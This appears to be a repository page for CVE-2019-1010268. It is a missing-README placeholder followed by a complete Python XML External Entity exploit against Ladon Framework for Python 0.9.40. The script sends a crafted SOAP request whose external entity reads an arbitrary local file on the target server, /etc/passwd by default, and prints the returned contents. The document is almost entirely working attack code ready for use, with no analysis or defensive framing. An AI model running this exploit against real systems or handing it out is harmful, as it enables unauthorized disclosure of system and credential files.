README.md
README.md not found for CVE-2019-1010268. The file may not exist in the repository.
#!/usr/bin/python3
import requests
import argparse
import xml.dom.minidom
def main():
parser = argparse.ArgumentParser(description='Ladon Framework for Python 0.9.40 - XML External Entity Expansion ')
parser.add_argument('--lhost', '-l', dest='domain', default='localhost')
parser.add_argument('--apppath', '-a', dest='app_name', default='firstapp')
parser.add_argument('--read', '-r', dest='read_file', default='/etc/passwd')
args = parser.parse_args()
all_headers = {'Content-Type' : 'text/xml;charset=UTF-8', 'SOAPAction' : f"http://{args.domain}:8888/{args.app_name}/soap11/checkout" }
xml_data = f"""<?xml version="1.0"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file://{args.read_file}">
]>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:urn="urn:HelloService"><soapenv:Header/>
<soapenv:Body>
<urn:checkout soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<uid xsi:type="xsd:string">&passwd;</uid>
</urn:checkout>
</soapenv:Body>
</soapenv:Envelope>
"""
url = f"http://{args.domain}:8888/{args.app_name}/soap11"
encoded_xml = xml_data.encode()
data = requests.post(url, headers= all_headers ,data=encoded_xml)
if (data.status_code ==200):
dom = xml.dom.minidom.parseString(data.text)
pretty_xml_as_string = dom.toprettyxml()
print(pretty_xml_as_string)
else:
print( "File may not be readable or may not exist")
if __name__ == '__main__':
main()